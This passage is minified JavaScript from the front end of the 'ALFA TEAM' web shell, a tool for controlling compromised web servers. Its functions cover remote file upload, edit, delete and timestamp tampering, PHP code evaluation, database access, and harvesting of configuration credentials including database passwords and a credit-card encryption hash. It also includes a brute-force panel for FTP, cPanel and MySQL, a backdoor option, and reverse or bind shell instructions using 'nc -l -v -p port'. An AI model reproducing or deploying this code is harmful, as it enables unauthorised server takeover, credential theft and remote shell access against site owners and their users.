scripts=newElement.getElementsByTagName("script"),i=0;i<scripts.length;++i){var script=scripts[i];eval(script.innerHTML)}}function _Ajax(e,a,t,i,l){var o=!1;return window.XMLHttpRequest?o=new XMLHttpRequest:window.ActiveXObject&&(o=new ActiveXObject("Microsoft.XMLHTTP")),void 0!==l&&(_ALFA_AJAX_[l]=o),o?(o.onreadystatechange=function(){4==o.readyState&&200==o.status?"function"==typeof t&&(t(o.responseText,l),alfaClearAjax(l)):4==o.readyState&&200!=o.status&&(alfaAjaxError(o.status,l,o.statusText,o.responseText),alfaClearAjax(l))},o.open("POST",e,!0),o.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),void o.send(a)):void alert("Error !")}function alfaClearAjax(e){_ALFA_AJAX_.hasOwnProperty(e)&&delete _ALFA_AJAX_[e]}function handleup(e,a){var t="__fnameup";if(0!=a&&(t="__fnameup"+a),e.files.length>1){for(var i="",l=0;l<e.files.length;l++)i+=e.files[0].name+", ";$(t).innerHTML=i}else e.files[0].name&&($(t).innerHTML=e.files[0].name)}function u(e){var a=!1,t=0,i=alfa_current_fm_id,l=new FormData,o="filesman_holder_"+i;l.append("a",alfab64(e.a.value)),l.append("c",alfab64(e.c.value)),l.append("alfa1",alfab64(e.alfa1.value)),l.append("charset",alfab64(e.charset.value)),l.append("ajax",alfab64(e.ajax.value)),e.querySelectorAll("input[type=file]").forEach(function(e){if(0==e.value.length)return!1;if(e.files.length>1)for(var a=0;a<e.files.length;a++)l.append("f[]",e.files[a]);else l.append("f[]",e.files[0]);t++}),$("footerup").value="",$("__fnameup").innerHTML="";for(var r=1;r<=upcount;r++){var n=$("pfooterup_"+r);n&&n.parentNode.removeChild(n),upcount--}if(0==upcount&&upcount++,0==t)return!1;var s="up_bar_"+getRandom();$("up_bar_holder").insertAdjacentHTML("beforeend","<div id='"+s+"' class='up_bar'></div>");e.c.value;if(window.XMLHttpRequest?a=new XMLHttpRequest:window.ActiveXObject&&(a=new ActiveXObject("Microsoft.XMLHTTP")),a){var c=$(s);_ALFA_AJAX_[s]=a,a.upload&&(c.style.display="block",a.upload.onprogress=function(e){var a=e.position||e.loaded,t=e.totalSize||e.total,i=Math.floor(a/t*1e3)/10+"%";c.style.width=i}),a.onload=function(e){200===a.status?c.style.display="none":alfaAjaxError(a.status,"upload_area",a.statusText,a.responseText),alfaClearAjax(s)},a.onreadystatechange=function(){if(4==a.readyState&&200==a.status){if("noperm"!=a.responseText&&"[]"!=a.responseText){var e,t=JSON.parse(a.responseText),l="",r=d.querySelectorAll("#"+o+" #filemanager_table tr").length-3;for(e in t){++r;var n=t[e].name,s=encodeURIComponent(n),c=t[e].size,f=t[e].perm,_=t[e].modify,u=t[e].owner,p=loadType(n,"file");try{d.querySelector("#"+o+" .fmanager-row a[fname='"+n+"']").parentElement.parentElement.parentElement.remove()}catch(e){}l+='<tr class="fmanager-row" id="tr_row_'+r+'"><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="'+n+'" class="chkbx" id="checkbox'+r+'"><label for="checkbox'+r+'"></label></div></td><td id="td_row_'+r+'">'+p+'<div style="position:relative;display:inline-block;bottom:12px;"><a row="'+r+'" id="id_'+r+'" class="main_name" onclick="editor(\''+s+"','auto','','','','file');\" href=\"#action=fileman&amp;path="+c_+"&amp;file="+s+'" fname="'+n+'" ftype="file" path="'+c_+'" opt_title="">'+n+'</a></div></td><td><span style="font-weight:unset;" class="main_size">'+c+'</span></td><td><span style="font-weight:unset;" class="main_modify">'+_+'</span></td><td><span style="font-weight:unset;" class="main_owner_group">'+u+'</span></td><td><a id="id_chmode_'+r+'" href="javascript:void(0)" onclick="editor(\''+s+"','chmod','','','','file')\">"+f+'</a></td><td><a id="id_rename_'+r+'" title="Rename" class="actions" href="javascript:void(0);" onclick="editor(\''+s+"', 'rename','','','','file')\">R</a> <a id=\"id_touch_"+r+'" title="Modify Datetime" class="actions" href="javascript:void(0);" onclick="editor(\''+s+"', 'touch','','','','file')\">T</a> <a id=\"id_edit_"+r+'" class="actions" title="Edit" href="javascript:void(0);" onclick="editor(\''+s+"', 'edit','','','','file')\">E</a> <a id=\"id_download_"+r+'" title="Download" class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''+n+"', 'download')\">D</a><a id=\"id_delete_"+r+'" title="Delete" class="actions" href="javascript:void(0);" onclick="var chk = confirm(\'Are You Sure For Delete # '+s+" # ?'); chk ? g('FilesMan',null,'delete', '"+s+"') : '';\"> X </a></td></tr>"}d.querySelector("#"+o+" #filemanager_last_tr").insertAdjacentHTML("beforebegin",l),alfaShowNotification("File(s) uploaded successfully","Uploader"),alfaFmngrContextRow()}else alfaShowNotification("Folder has no permission...","Uploader","error");alfaCheckCurrentFilesManTab(i)}},a.open("POST",d.URL),a.send(l)}}function alfaCheckCurrentFilesManTab(e){-1==$("filesman_tab_"+e).classList.value.indexOf("filesman-tab-active")&&$("filesman_tab_"+e).classList.add("tab-is-done")}function g(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset){var fm_id=0==alfa_fm_id?alfa_current_fm_id:alfa_fm_id,fm_id2=alfa_fm_id,fm_path=null==c||0==c.length?c_:c,d_mf_c=fm_path,g_action_id=alfa_before_do_action_id;0==alfa_fm_id&&(set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset),d_mf_c=d.mf.c.value),"GetConfig"!=a&&"download"!=alfa2&&islinux&&"/"!=d_mf_c.substr(0,1)&&(d_mf_c="/"+d_mf_c),"FilesMan"==a?(alfaloader("filesman_holder_"+fm_id,"block"),g_action_id="filesman_holder_"+fm_id):""!=g_action_id?alfaloader(g_action_id,"block"):"FilesTools"!=a&&"download"!=alfa2&&"GetConfig"!=a&&("sql"==a?(showEditor("database_window"),g_action_id=loadPopUpDatabase("")):"FilesMan"!=a&&(showEditor("options_window"),g_action_id=loadPopUpOpTions(a)),alfaloader(g_action_id,"block"));for(var data="a="+alfab64(a)+"&c="+alfab64(d_mf_c)+"&",i=1;i<=10;i++)data+="alfa"+i+"="+alfab64(eval("d.mf.alfa"+i+".value"))+"&";if("FilesMan"==a){var pagenum=d.querySelector("#"+g_action_id+" .page-number.active-page-number");null!=pagenum&&(data+="pagenum="+alfab64(getCookie(g_action_id+"_page_number")),setCookie(g_action_id+"_page_number",1,2012))}if(data+="&ajax="+alfab64("true"),"FilesTools"==a&&"download"==alfa2){alfaLoaderOnTop("none");var dl=$("dlForm");return dl.a.value=alfab64("dlfile"),dl.c.value=alfab64(d_mf_c),dl.file.value=alfab64(alfa1),void dl.submit()}"GetConfig"!=a?(_Ajax(d.URL,data,function(e,t){evalJS(e);var i=!1;if(alfaLoaderOnTop("none"),"sql"==a)return console.log(t),loadPopUpDatabase(e,t),!1;if("FilesMan"==a){alfaloader("filesman_holder_"+fm_id,"none"),d.querySelector("#filesman_holder_"+fm_id).innerHTML=e,fm_path=fm_path.replace(/\/\//g,"/"),$("filesman_tab_"+fm_id).setAttribute("path",fm_path);var l=alfaGetLastFolderName(fm_path);d.querySelector("#filesman_tab_"+fm_id+" span").innerHTML=l,alfaFmngrContextRow(),"function"==typeof alfa1&&alfa1(e),alfaCheckCurrentFilesManTab(fm_id)}else(options_window_is_minimized||"."==t.substr(0,1))&&"."==t.substr(0,1)&&(i=!0,t=t.substr(1),showEditor("options_window")),i||alfaloader(t,"none"),loadPopUpOpTions(t,e),"phpeval"==a&&alfaLoadAceEditor("PhpCode"),"coldumper"==a.substr(0,9)&&alfaColDumperInit()},!1,""==g_action_id?"."+a:g_action_id),g_action_id="",0==fm_id2&&c!=c_&&c&&initDir(c)):(alfaloader(alfa3,"block"),_Ajax(d.URL,data,function(e,a){var t=a;a=d.querySelector("#"+("id_db"!=a.substr(0,5)?"option_"+a:a));try{(e=JSON.parse(e)).host&&e.user&&e.dbname&&($("db_host")&&(a.querySelector("#db_host").value=e.host),$("db_user")&&(a.querySelector("#db_user").value=e.user),$("db_name")&&(a.querySelector("#db_name").value=e.dbname),$("db_pw")&&(a.querySelector("#db_pw").value=e.password),$("db_prefix")&&e.prefix&&(a.querySelector("#db_prefix").value=e.prefix),$("cc_encryption_hash")&&e.cc_encryption_hash&&(a.querySelector("#cc_encryption_hash").value=e.cc_encryption_hash))}catch(e){}alfaloader(t,"none")},!1,alfa3))}function alfaGetLastFolderName(e){var a=e.replace(/\/\//g,"/").split("/");for(var t in a)0==a[t].length&&a.splice(t,1);var i=a[a.length-1];return 0==i.length&&(i="/"),i}function alfaloader(e,a){if(0==e.length)return!1;try{var t=$("loader_"+e);if(null==t&&"block"==a){var i=null;"editor"==e?i=d.querySelector("#editor .editor-modal"):"id_db"==e.substr(0,5)?i=$(e):"terminal_id"==e.substr(0,11)?i=$(e):"editor"==e.substr(0,6)?i=$(e):"cgiframe"==e?i=$("cgiframe"):"filesman_holder"==e.substr(0,15)?(i=$(e)).style.minHeight="300px":i=$("option_"+e),i.insertAdjacentHTML("afterbegin","<div id='loader_"+e+'\' class="options-loader-holder"><div parent="'+e+'" onclick="alfaAjaxController(this);" class="stopAjax">[ Stop it ]</div><div class="alfateam-loader-text">ALFA TEAM</div><div class="alfa-ajax-error"></div><img src=\'http://solevisible.com/images/loader.svg\'></div>')}else"filesman_holder"==e.substr(0,15)&&($(e).style.minHeight="0"),null!=t&&(t.style.display=a)}catch(e){}}function fs(e){var a=e.getAttribute("db_id"),t=d.querySelector("#"+a+" div.sf");mysql_cache.hasOwnProperty(a)||(mysql_cache[a]={}),alfaloader(a,"block");var i=t.querySelector("input[name=sql_host]").value,l=t.querySelector("input[name=sql_login]").value,o=t.querySelector("input[name=sql_pass]").value,r=t.querySelector("input[name=sql_base]")?t.querySelector("input[name=sql_base]").value:t.querySelector("select[name=sql_base]").value,n=t.querySelector("select[name=type]").value,s=t.querySelector("input[name=sql_count]").checked?"true":"";_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64("query")+"&alfa2=&c="+alfab64(c_)+"&charset="+alfab64("UTF-8")+"&type="+alfab64(n)+"&sql_host="+alfab64(i)+"&sql_login="+alfab64(l)+"&sql_pass="+alfab64(o)+"&sql_base="+alfab64(r)+"&sql_count="+alfab64(s)+"&current_mysql_id="+alfab64(a)+"&ajax="+alfab64("true"),function(e,a){loadPopUpDatabase(e,a),evalJS(e),alfaloader(a,"none")},!1,a)}function ctlbc(e){var a=$("bcStatus"),t=$("bcipAction");"bind"==e.value?(t.style.display="none",a.innerHTML="<small>Press ` <font color='red'>>></font> ` button and run ` <font color='red'>nc server_ip port</font> ` on your computer</small>"):(t.style.display="inline-block",a.innerHTML="<small>Run ` <font color='red'>nc -l -v -p port</font> ` on your computer and press ` <font color='red'>>></font> ` button</small>")}function $(e){return d.getElementById(e)}function addnewup(){var e="footerup_"+upcount,a="pfooterup_"+upcount,t=1!=upcount?"pfooterup_"+(upcount-1):"pfooterup",i=d.createElement("p");i.innerHTML='<label class="inputfile" for="'+e+'"><span id="__fnameup'+upcount+'"></span> <strong>&nbsp;&nbsp;Choose a file</strong></label><input id="'+e+'" type="file" name="f[]" onChange="handleup(this,'+upcount+');" multiple>',i.id=a,i.appendAfter($(t)),upcount++}function alfa_searcher_tool(e){switch(e){case"all":case"dirs":_alfaSet(!0,"Disabled");break;case"files":_alfaSet(!1,"php")}}function _alfaSet(e,a){d.srch.ext.disabled=e,d.srch.ext.value=a}function dis_input(e){switch(e){case"phpmyadmin":bruteSet(!0,"Disabled","http://");break;case"direct":bruteSet(!1,"2222","http://");break;case"cp":bruteSet(!1,"2082","http://");break;case"ftp":bruteSet(!0,"Disabled","ftp://");break;case"mysql":bruteSet(!1,"3306","http://");break;case"ftpc":bruteSet(!1,"21","http://")}}function bruteSet(e,a,t){c="21"!=a?"localhost":"ftp.example.com",$("port").disabled=e,$("port").value=a,$("target").value=c,$("protocol").value=t}function inBackdoor(e){"my"==e.value?$("backdoor_textarea").style.display="block":$("backdoor_textarea").style.display="none"}function saveByKey(e){return!("s"==String.fromCharCode(e.which).toLowerCase()&&e.ctrlKey||19==e.which)||($("editor_edit_area").onsubmit(),e.preventDefault(),!1)}function alfaAjaxError(e,a,t,i){if(void 0!==a){var l=d.querySelector("#loader_"+a);null!=l&&(firewall="",403==e&&(firewall=" ~ FireWall Detected!"),l.querySelector("img").remove(),l.querySelector(".alfa-ajax-error").innerHTML=e+" ( "+t+firewall+" )",alfaShowNotification(t,"Ajax","error"))}}function alfaInitCwdContext(){d.querySelectorAll(".header_pwd").forEach(function(e){e.addEventListener("contextmenu",function(e){var a=e.target.getAttribute("path"),t=d.querySelector("#rightclick_menu > a[name=newtab]");t.setAttribute("href","javascript:void(0);"),t.removeAttribute("target"),t.onclick=function(){alfaFilesManNewTab(a,"/")};var i=e.clientX,l=e.clientY;alfaSortMenuItems(["newtab"]),alfaRightClickMenu(i,l),e.preventDefault()})})}function alfaRightClickMenu(e,a){rightclick_menu_context.top=a+"px",rightclick_menu_context.left=e+"px",rightclick_menu_context.visibility="visible",rightclick_menu_context.opacity="1"}function alfaSortMenuItems(e){var a=["newtab","link","download","view","edit","move","copy","rename","modify","permission","compress","extract","delete","view_archive"],t=!1;for(var i in a){for(var l in t=!1,e)a[i]!=e[l]||(d.querySelector("#rightclick_menu > a[name="+a[i]+"]").style.display="block",t=!0);t||(d.querySelector("#rightclick_menu > a[name="+a[i]+"]").style.display="none")}}function alfaAceChangeSetting(e,a){var t=e.options[e.selectedIndex].value,i=e.getAttribute("base"),l=alfa_ace_editors.editor;"eval"==i&&(l=alfa_ace_editors.eval);var o=e.getAttribute("ace_id");"lang"==a?l[o].session.setMode("ace/mode/"+t):"theme"==a&&l[o].setTheme("ace/theme/"+t),setCookie("alfa_ace_"+a+"_"+i,t,2012)}function alfaAceChangeWrapMode(e,a){var t=alfa_ace_editors.editor;"eval"==a&&(t=alfa_ace_editors.eval);var i=e.getAttribute("ace_id");e.checked?t[i].session.setUseWrapMode(!0):t[i].session.setUseWrapMode(!1)}function alfaAceChangeFontSize(e,a,t){var i=alfa_ace_editors.editor;"eval"==e&&(i=alfa_ace_editors.eval);var l=t.getAttribute("ace_id"),o=i[l].getFontSize();"+"==a?++o:--o,i[l].setFontSize(o),setCookie("alfa_ace_fontsize_"+e,o,2012)}function setCookie(e,a,t){var i=new Date;i.setTime(i.getTime()+24*t*60*60*1e3);var l="expires="+i.toUTCString();document.cookie=e+"="+a+";"+l+";path=/"}function getCookie(e){var a=("; "+document.cookie).split("; "+e+"=");if(2==a.length)return a.pop().split(";").shift()}function editorClose(e){if(d.body.style.overflow="visible",elem=$(e),elem.setAttribute("class","editor-anim-close"),"editor"==e){if(is_minimized=!1,null!=alfa_ace_editors.editor&&null!=alfa_ace_editors.editor){for(var a in alfa_ace_editors.editor)alfa_ace_editors.editor[a].destroy();alfa_ace_editors.editor=null,d.querySelector(".editor-tabs").innerHTML="",d.querySelector(".editor-content-holder").innerHTML=""}}else if("cgiloader"==e)php_temrinal_using_cgi&&(d.querySelector(".terminal-tabs").innerHTML="",d.querySelector(".terminal-contents").innerHTML=""),php_temrinal_using_cgi=!1,cgi_is_minimized=!1;else if("options_window"==e){if(options_window_is_minimized=!1,null!=alfa_ace_editors.eval){for(var a in alfa_ace_editors.eval)alfa_ace_editors.eval[a].destroy();alfa_ace_editors.eval=null,d.querySelectorAll(".php-evals").forEach(function(e){e.removeAttribute("ace")})}}else"database_window"==e&&(database_window_is_minimized=!1);setTimeout(function(){elem=$(e),elem.removeAttribute("class"),elem.style.display="none","options_window"==e&&(elem.querySelector(".options_tab").innerHTML="",elem.querySelector(".options_content").innerHTML="")},1e3),d.body.style.overflow="visible"}function popupWindowBackPosition(){var e={cgiloader:cgi_is_minimized,options_window:options_window_is_minimized,database_window:database_window_is_minimized,editor:is_minimized},a=[];for(var t in e)e[t]&&a.push(t);1==a.length?$(a[0]+"-minimized").style.top="30%":2==a.length?($(a[0]+"-minimized").style.top="20%",$(a[1]+"-minimized").style.top="50%"):3==a.length?($(a[0]+"-minimized").style.top="0%",$(a[1]+"-minimized").style.top="30%",$(a[2]+"-minimized").style.top="60%"):4==a.length&&($(a[0]+"-minimized").style.top="0%",$(a[1]+"-minimized").style.top="30%",$(a[2]+"-minimized").style.top="55%",$(a[3]+"-minimized").style.top="80%")}function showEditor(e){if($(e).setAttribute("class","editor-anim-show"),$(e+"-minimized").setAttribute("class","minimized-hide"),"editor"==e)is_minimized=!1;else if("cgiloader"==e)cgi_is_minimized=!1;else if("options_window"==e){options_window_is_minimized=!1;var a=d.querySelector("#options_window .content_options_holder .options_tab .tab_name.tab_is_active.tab-is-done");null!=a&&a.classList.remove("tab-is-done")}else"database_window"==e&&(database_window_is_minimized=!1);popupWindowBackPosition(),d.body.style.overflow="hidden"}function editorMinimize(e){$(e).setAttribute("class","editor-anim-minimize"),$(e+"-minimized").setAttribute("class","minimized-show"),"editor"==e?is_minimized=!0:"cgiloader"==e?cgi_is_minimized=!0:"options_window"==e?options_window_is_minimized=!0:"database_window"==e&&(database_window_is_minimized=!0),popupWindowBackPosition(),d.body.style.overflow="visible"}function clearEditorHistory(){if(confirm("Are u Sure?"))for(var e in editor_files)e!=editor_current_file&&removeHistory(e)}function isArchive(e){var a,t=[".tar.gz",".tar.bz2",".tar.z",".tar.xz",".zip",".zipx",".7z",".bz2",".gz",".rar",".tar",".tgz"];for(a in t)if(new RegExp("(.*)("+t[a].replace(/\./g,"\\.")+")$","gi").test(e))return!0;return!1}function editor(e,a,t,i,l,o){if("dir"==o&&".."==e)return!1;if("download"==a)return g("FilesTools",i,e,"download"),!1;var r="",n="",s="",c="",f=d.mf.c.value,_=!0;if(e=e.trim(),0==Object.keys(editor_files).length){var u=getCookie("alfa_history_files");try{for(var p in u=atob(u),editor_files=JSON.parse(u))insertToHistory(p,editor_files[p].file,0,editor_files[p].type)}catch(e){}}if("phar://"==e.substr(0,7))f=c_;else if(-1!=e.indexOf("/")){var m=e.split("/");e=m[m.length-1],delete m[m.length-1],f=m.join("/"),islinux&&(f="/"+f)}if(void 0===o&&(o=""),void 0!==i&&null!=i&&0!=i.length&&(f=i.trim()),"auto"==a&&isArchive(e))return alfaSyncMenuToOpt(e,!0),!1;try{for(var v in editor_files)if(editor_files[v].file==decodeURIComponent(e)&&editor_files[v].pwd.replace(/\//g,"")==f.replace(/\//g,"")){_=!1,l=v;break}}catch(e){}if(editor_error=!0,void 0!==t&&0!=t.length&&null!=t&&(r=alfab64(t)),void 0!==l&&null!=l&&0!=l.length)n=alfab64(l),s=l,c=l.replace("file_","");else{var h="file_"+(c=getRandom(10));n=alfab64(h),s=h}var b="editor_source_"+c;if(null==$(b)){try{d.querySelector(".editor-contents.editor-content-active").classList.remove("editor-content-active")}catch(e){}try{d.querySelector(".editor-tabs .editor-tab-name.editor-tab-active").classList.remove("editor-tab-active")}catch(e){}d.querySelector(".editor-tabs").insertAdjacentHTML("beforeend","<div onclick='editorTabController(this);' opt_id='"+b+"' id='tab_"+b+"' class='editor-tab-name editor-tab-active'>"+decodeURIComponent(e)+" <img opt_id='"+b+"' onclick='closeEditorContent(this,event);return false;' title='[close]' src='http://solevisible.com/icons/menu/delete.svg'></div>"),d.querySelector(".editor-content-holder").insertAdjacentHTML("afterbegin","<div class='editor-contents editor-content-active' id='"+b+"'></div>")}return 0==is_minimized&&"none"==$("editor").style.display?($("editor").style.display="block",showEditor("editor"),alfaloader(b,"block")):(is_minimized&&showEditor("editor"),null!=$(b)?alfaloader(b,"block"):(alfaloader("editor","block"),b="editor")),_Ajax(d.URL,"a="+alfab64("FilesTools")+"&c="+alfab64(f)+"&alfa1="+alfab64(e)+"&alfa2="+alfab64(a)+"&alfa3="+r+"&alfa4="+n+"&alfa5=&alfa6=&alfa7=&alfa8=&alfa9=&alfa10=&&ajax="+alfab64("true"),function(t,i){var l=$("tab_"+i);try{null!=l&&((-1==l.classList.value.indexOf("editor-tab-active")||is_minimized)&&(l.classList.add("tab-is-done"),alfaShowNotification("proccess is done...","Editor: "+l.innerText)),is_minimized&&alfaUpdateOptionsBadge("editor"))}catch(t){}if("none"==$("editor").style.display?alfaLoaderOnTop("none"):alfaloader(i,"none"),r.length>0&&"edit"==a)return is_minimized||null!=l&&-1!=l.classList.value.indexOf("editor-tab-active")&&alfaShowNotification("saved...!","Editor"),!1;if(null!=$(i)&&($(i).innerHTML=t),is_minimized&&alfaShowNotification("proccess is done...","Editor: "+decodeURIComponent(e)),$("editor").style.display="block",evalJS(t),alfaLoadAceEditor("view_ml_content"),"delete"!=a&&editor_error){var c=d.getElementsByClassName("is_active");0!=c.length&&(c[0].className="file-holder"),n=s,e=decodeURIComponent(e),!editor_files[n]&&_?(editor_files[n]={file:e,pwd:f,type:o},insertToHistory(n,e," is_active",o),"mkfile"==a&&g("FilesMan",null)):$(n).parentNode.className+=" is_active"}d.body.style.overflow="hidden",d.getElementsByClassName("filestools")[0].setAttribute("fid",n),editor_files[n]&&(d.getElementsByClassName("editor-path")[0].innerHTML=(editor_files[n].pwd+"/"+editor_files[n].file).replace(/\/\//g,"/")),editor_current_file=n,updateCookieEditor()},!1,b),!1}function alfaLoadAceEditor(e,a){if(void 0===a&&(a=!1),null==$("alfa-ace-plugin")){var t=document.createElement("script");return t.src="https://cdnjs.cloudflare.com/ajax/libs/ace/1.4.11/ace.js",t.id="alfa-ace-plugin",t.onload=function(){alfaLoadAceEditor(e,a)},d.body.appendChild(t),!1}try{"allow"==$(e).getAttribute("mode")&&(a=!1)}catch(e){}if("view_ml_content"==e){null==alfa_ace_editors.editor&&(alfa_ace_editors.editor={});var i=getCookie("alfa_ace_theme_editor"),l=getCookie("alfa_ace_fontsize_editor");void 0===i&&(i="terminal"),0==i.length&&(i="terminal"),d.querySelectorAll(".editor-ace-controller").forEach(function(e){if(null!=e.getAttribute("ace"))return!1;e.setAttribute("ace","ok");var t=getRandom(10),o=e.querySelector(".view_ml_content");o.setAttribute("id","view_ml_content-"+t),alfa_ace_editors.editor["view_ml_content-"+t]=ace.edit(o),alfa_ace_editors.editor["view_ml_content-"+t].setReadOnly(a),alfa_ace_editors.editor["view_ml_content-"+t].setShowPrintMargin(!1),alfa_ace_editors.editor["view_ml_content-"+t].setTheme("ace/theme/"+i),alfa_ace_editors.editor["view_ml_content-"+t].session.setMode("ace/mode/php"),alfa_ace_editors.editor["view_ml_content-"+t].session.setUseWrapMode(!0),alfa_ace_editors.editor["view_ml_content-"+t].commands.addCommand({name:"save",bindKey:{win:"Ctrl-S",mac:"Cmd-S"},exec:function(e){d.querySelector("#ace-save-btn-"+t).click()}}),e.querySelector("select.ace-theme-selector").value=i,e.querySelectorAll(".ace-controler").forEach(function(e){e.setAttribute("ace_id","view_ml_content-"+t),-1!=e.classList.value.indexOf("ace-save-btn")&&e.setAttribute("id","ace-save-btn-"+t)}),void 0!==l&&setTimeout(function(){alfa_ace_editors.editor["view_ml_content-"+t].setFontSize(parseInt(l))},1e3)})}else{null==alfa_ace_editors.eval&&(alfa_ace_editors.eval={});i=getCookie("alfa_ace_theme_eval"),l=getCookie("alfa_ace_fontsize_eval");void 0===i&&(i="terminal"),0==i.length&&(i="terminal"),d.querySelectorAll(".php-evals").forEach(function(e){if(null!=e.getAttribute("ace"))return!1;e.setAttribute("ace","ok");var t=e.querySelector(".php-evals-ace"),o=getRandom(10);t.setAttribute("id","phpeval-"+o),alfa_ace_editors.eval["phpeval-"+o]=ace.edit(t),alfa_ace_editors.eval["phpeval-"+o].setReadOnly(a),alfa_ace_editors.eval["phpeval-"+o].setShowPrintMargin(!1),alfa_ace_editors.eval["phpeval-"+o].setTheme("ace/theme/"+i),alfa_ace_editors.eval["phpeval-"+o].session.setMode("ace/mode/php"),alfa_ace_editors.eval["phpeval-"+o].session.setUseWrapMode(!0),e.querySelector("select.ace-theme-selector").value=i,e.querySelectorAll(".ace-controler").forEach(function(e){e.setAttribute("ace_id","phpeval-"+o)}),void 0!==l&&setTimeout(function(){alfa_ace_editors.eval["phpeval-"+o].setFontSize(parseInt(l))},1e3)})}}function insertToHistory(e,a,t,i){var l="";t&&0!=t&&(l=t);var o=document.createElement("div");o.innerHTML="<div id='"+e+"' class='history' onClick='reopen(this);'><div class='editor-icon'>"+loadType(a,i,e)+"</div><div class='editor-file-name'>"+a+"</div></div><div class='history-close' onClick='removeHistory(\""+e+"\");'>X</div>",o.className="file-holder"+l,o.addEventListener("mouseover",function(){setEditorTitle(e,"over"),this.childNodes[1].style.opacity="1"}),o.addEventListener("mouseout",function(){setEditorTitle(e,"out"),this.childNodes[1].style.opacity="0"});var r=d.getElementsByClassName("history-list")[0];r.insertBefore(o,r.firstChild)}function loadType(e,a,t){"none"==a&&_Ajax(d.URL,"a="+alfab64("checkfiletype")+"&path="+alfab64(editor_files[t].pwd)+"&arg="+alfab64(editor_files[t].file),function(e){$(t).innerHTML="<div class='editor-icon'>"+loadType(editor_files[t].file,e,t)+"</div><div class='editor-file-name'>"+editor_files[t].file+"</div>",editor_files[t].type=e});if("file"==a){a=(a=e.split("."))[a.length-1].toLowerCase();-1==["json","ppt","pptx","xls","xlsx","msi","config","cgi","pm","c","cpp","cs","java","aspx","asp","db","ttf","eot","woff","woff2","woff","conf","log","apk","cab","bz2","tgz","dmg","izo","jar","7z","iso","rar","bat","sh","alfa","gz","tar","php","php4","php5","phtml","html","xhtml","shtml","htm","zip","png","jpg","jpeg","gif","bmp","ico","txt","js","rb","py","xml","css","sql","htaccess","pl","ini","dll","exe","mp3","mp4","m4a","mov","flv","swf","mkv","avi","wmv","mpg","mpeg","dat","pdf","3gp","doc","docx","docm"].indexOf(a)&&(a="notfound")}else a="folder";return'<img src="http://solevisible.com/icons/{type}" width="30" height="30">'.replace("{type}",a+".png")}function updateFileEditor(e,a){var t="id_"+e,i="id_chmode_"+e,l="id_rename_"+e,o="id_touch_"+e,r="id_edit_"+e,n="id_download_"+e,d="id_delete_"+e,s=$(t).getAttribute("ftype");"folder"==s&&(s="dir"),"file"==s?($(t).innerHTML=a,$(t).setAttribute("href","#action=fileman&path="+c_+"/"+a),$(t).setAttribute("onclick","editor('"+a+"','auto','','','','file')"),$(r).setAttribute("onclick","editor('"+a+"','edit','','','','"+s+"')"),$(n).setAttribute("onclick","g('FilesTools',null,'"+a+"', 'download')")):($(t).innerHTML="<b>| "+a+" |</b>",$(t).setAttribute("onclick","g('FilesMan', '"+c_+"/"+a+"')")),$(i).setAttribute("onclick","editor('"+a+"','chmod','','','','"+s+"')"),$(l).setAttribute("onclick","editor('"+a+"','rename','','','','"+s+"')"),$(o).setAttribute("onclick","editor('"+a+"','touch','','','','"+s+"')"),$(d).setAttribute("onclick","var chk = confirm('Are You Sure For Delete # "+a+" # ?'); chk ? g('FilesMan',null,'delete', '"+a+"') : '';"),$(t).setAttribute("fname",a)}function updateDirsEditor(e,a){var t=d.mf.c.value+"/",i=editor_files[e].pwd+"/"+a+"/",l=editor_files[e].pwd+"/"+editor_files[e].file+"/";for(var o in i=i.replace(/\/\//g,"/"),l=l.replace(/\/\//g,"/"),-1!=(t=t.replace(/\/\//g,"/")).search(i)&&(initDir(t.replace(i,l)),d.mf.c.value=t.replace(i,l)),editor_files){var r=editor_files[o].pwd+"/";-1!=(r=r.replace(/\/\//g,"/")).search(i)&&(editor_files[o].pwd=r.replace(i,l))}updateCookieEditor()}function updateCookieEditor(){setCookie("alfa_history_files",btoa(JSON.stringify(editor_files)),2012)}function setEditorTitle(e,a){if("out"==a&&""!=editor_current_file){var t=d.querySelector(".editor-tab-name.editor-tab-active");e=null!=t?t.getAttribute("opt_id").replace("editor_source_","file_"):editor_current_file}editor_files[e]&&(d.getElementsByClassName("editor-path")[0].innerHTML=(editor_files[e].pwd+"/"+editor_files[e].file).replace(/\/\//g,"/"))}function removeHistory(e){delete editor_files[e],$(e)&&$(e).parentNode.parentNode.removeChild($(e).parentNode);var a=d.getElementsByClassName("filestools")[0];a&&a.getAttribute("fid")==e&&(a.outerHTML=""),editor_current_file==e&&(editor_current_file=""),updateCookieEditor()}function getRandom(e){for(var a="",t="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ",i=void 0===e?20:e;i>0;--i)a+=t[Math.floor(Math.random()*t.length)];return a}function reopen(e){var a=e.getAttribute("id"),t=editor_files[a].pwd,i=editor_files[a].file,l="editor_source_"+a.replace("file_","");null==$(l)?editor(i,"auto","",t,a):editorTabController(l,!0)}function copyToClipboard(e){e=e.getAttribute("ace_id");var a=alfa_ace_editors.editor[e].selection.toJSON();alfa_ace_editors.editor[e].selectAll(),alfa_ace_editors.editor[e].focus(),document.execCommand("copy"),alfa_ace_editors.editor[e].selection.fromJSON(a),alfaShowNotification("text copied","Editor")}function encrypt(e,a){if(null==a||a.length<=0)return null;e=alfab64(e,!0),a=alfab64(a,!0);for(var t="",i="",l=0;l<e.length;)for(var o=0;o<a.length&&(t=e.charCodeAt(l)^a.charCodeAt(o),i+=String.fromCharCode(t),!(++l>=e.length));o++);return alfab64(i,!0)}function reloadSetting(e){return 